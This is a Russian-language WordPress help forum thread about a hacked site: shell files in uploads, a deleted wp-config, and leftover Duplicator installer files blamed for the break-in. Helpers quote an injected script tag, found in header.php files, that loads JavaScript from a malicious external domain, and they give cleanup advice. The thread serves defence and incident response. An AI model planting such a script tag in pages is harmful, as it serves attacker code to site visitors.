Появились php файлы в uploads

Непосредственно в uploads вчера вылез
..
А да на фоне этого всего еще удалился wp-config.

Те же симптомы и те же даты, что я буквально вчера такое чистил у своего клиента. И у меня большие подозрения что это хостинг. Либо какие-то плагины.
Можете сказать какой хостинг, какие плагины и тема, их версии. И версию ВП тоже скажите, пож.

И ещё проверьте ВСЕ файлы header.php (на всём аккаунте, во всех темах, в ядре ВП) в <head> на предмет таких строк: <script type='text/javascript' src='https://souce.uustoughtonma.org/pk.js?f=2'></script>
Встречается 2 раза — в начале и в конце <head>
Есть? такой?

Просто их удалять смысла нет. Где один — там и другие.

На удивление, я нашел всего 2 копии шелла и всего на одном сайте. Но header.php — все изгадили. А там их более сотни (несколько тесовых сайтов, не удалённое старьё типа на всякий случай валяется. Вне раб. сайтов разумеется).
Это конечно не говорит что у ТСа тоже не будет. Просто для инфы.

Из общего только All In One SEO Pack.

Но «тема кастомная», так что.. Всё может быть.

А что плагинов действительно так мало? Или есть ещё и другие, но отключённые?
А сайт переносили дубликатором? Не осталось случайно в корне installer.php или installer-backup.php

Выключен Duplicator 1.2.40
В корне есть:
installer.php
installer-backup.php

https://wpvulndb.com/vulnerabilities/9123 (спс YUI за ссылку :))

понял, что сейчас мне надо проверить бд (если я правильно перевел, то именно через бд это делается?)

Нет, Вам стоит перезалить все файлы и воспользоваться айболитом для поиска шеллов (в общем см ответ Юрия).
Переустановить ВП можно прям из админки.
Но прежде — удалить указанные файлы от дубликатора.
Так же не помешает сделать поиск по вхождению tempcrawl (см свой скриншот) по всем php-файлам.